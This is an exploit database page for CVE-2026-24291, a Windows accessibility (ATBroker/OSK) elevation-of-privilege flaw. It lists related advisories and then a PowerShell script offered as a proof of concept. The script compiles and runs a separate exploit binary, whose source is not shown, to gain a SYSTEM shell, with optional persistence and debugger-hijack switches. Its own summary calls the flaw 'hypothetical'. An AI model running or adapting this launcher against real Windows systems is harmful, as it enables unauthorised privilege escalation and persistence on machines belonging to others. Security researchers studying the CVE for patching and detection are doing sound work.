📄 OSK Privilege Escalation
| Reporter | Title | Published | Views | Family All 48 |
|---|---|---|---|---|
| Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft | 18 Mar 202616:34 | – | githubexploit | |
| CVE-2026-24291 | 10 Mar 202617:04 | – | attackerkb | |
| The vulnerability of the registration broker for Windows auxiliary technologies, ATBroker.exe, in Windows operating systems, allows a perpetrator to increase their privileges. | 13 Mar 202600:00 | – | bdu_fstec | |
| CVE-2026-24291 | 10 Mar 202616:57 | – | circl | |
| Microsoft Windows 安全漏洞 | 10 Mar 202600:00 | – | cnnvd | |
| CVE-2026-24291 | 10 Mar 202617:04 | – | cve | |
| CVE-2026-24291 Windows Accessibility Infrastructure (ATBroker.exe) Elevation of Privilege Vulnerability | 10 Mar 202617:04 | – | cvelist | |
| EUVD-2026-10614 | 10 Mar 202618:31 | – | euvd | |
| EUVD-2026-10615 | 10 Mar 202618:31 | – | euvd | |
| Security information for Hitachi Disk Array Systems | 25 May 202602:39 | – | jvn |
10
==================================================================================================================================
| # Title : OSK EoP Exploit Wrapper Build and Execution Automation Script |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : This PowerShell script acts as a wrapper/launcher for a compiled Windows exploit binary targeting a hypothetical OSK (On-Screen Keyboard) Elevation of Privilege vulnerability.
[+] POC :
param(
[switch]$Persist,
[switch]$Debugger,
[switch]$Force
)
Write-Host @"
========================================
CVE-2026-24291 - OSK EoP Exploit
SYSTEM Privilege Escalation
by indoushka
========================================
"@ -ForegroundColor Cyan
$msvc = Get-ChildItem "C:\Program Files\Microsoft Visual Studio\*\*\VC\Tools\MSVC\*\bin\Hostx64\x64\cl.exe" -ErrorAction SilentlyContinue | Select-Object -First 1
if (-not $msvc) {
Write-Host "[!] Visual Studio not found. Install Build Tools." -ForegroundColor Red
exit 1
}
$vcVars = "C:\Program Files\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat"
if (Test-Path $vcVars) {
cmd /c "`"$vcVars`" > nul 2>&1 && cl.exe"
}
Write-Host "[*] Compiling exploit..." -ForegroundColor Yellow
$source = "osk_eop.cpp"
$output = "osk_eop.exe"
if (Test-Path $output) { Remove-Item $output }
& cl.exe /EHsc /O2 /MT $source /Fe$output /link advapi32.lib user32.lib
if (-not (Test-Path $output)) {
Write-Host "[!] Compilation failed" -ForegroundColor Red
exit 1
}
Write-Host "[+] Compilation successful" -ForegroundColor Green
Write-Host "[*] Starting OSK for initialization..." -ForegroundColor Yellow
Start-Process "osk.exe" -WindowStyle Hidden
Start-Sleep -Seconds 2
Get-Process "osk" -ErrorAction SilentlyContinue | Stop-Process -Force
$args = @()
if ($Persist) { $args += "--persist" }
if ($Debugger) { $args += "--debugger" }
Write-Host "[*] Running exploit..." -ForegroundColor Green
& .\$output $args
Write-Host "`n[*] Check for SYSTEM shell. UAC prompt may appear - dismiss it." -ForegroundColor Cyan
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 May 2026 00:00Current
6Medium risk
Vulners AI Score6
CVSS 3.17.8
EPSS0.03239
SSVC